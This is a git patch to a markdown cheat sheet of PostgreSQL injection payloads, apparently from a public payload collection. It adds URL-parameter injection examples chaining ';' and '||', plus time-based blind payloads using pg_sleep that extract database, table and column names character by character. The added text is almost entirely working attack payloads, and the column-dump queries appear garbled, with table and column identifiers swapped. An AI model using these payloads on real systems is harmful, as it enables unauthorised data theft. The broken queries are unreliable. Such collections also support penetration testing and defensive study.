From aa89a909d178c076baf7bf5e71c10925697929ff Mon Sep 17 00:00:00 2001
From: Dhmos Funk <45040001+dhmosfunk@users.noreply.github.com>
Date: Sat, 10 Sep 2022 15:56:31 +0300
Subject: [PATCH] Update PostgreSQL Injection.md

---
 SQL Injection/PostgreSQL Injection.md | 33 +++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)

diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md
index ce07cf4..72efb30 100644
--- a/SQL Injection/PostgreSQL Injection.md
+++ b/SQL Injection/PostgreSQL Injection.md
@@ -34,6 +34,16 @@
 /**/
 ```
 
+## PostgreSQL chain injection points symbols
+```sql
+; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier.
+|| #or statement
+
+# usage examples:
+/?whatever=1;(select 1 from pg_sleep(5))
+/?whatever=1||(select 1 from pg_sleep(5))
+```
+
 ## PostgreSQL Version
 
 ```sql
@@ -140,6 +150,29 @@ Note, with the above queries, the output needs to be assembled in memory. For la
 ```
 
 ## PostgreSQL Time Based
+#### Identify time based
+
+```sql
+select 1 from pg_sleep(5)
+;(select 1 from pg_sleep(5))
+||(select 1 from pg_sleep(5))
+```
+
+#### Database dump time based
+```sql
+select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
+```
+
+#### Table dump time based
+```sql
+select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
+```
+#### columns dump time based
+```sql
+select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name limit 1
+select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name where column_name='value' limit 1
+```
+
 ```sql
 AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))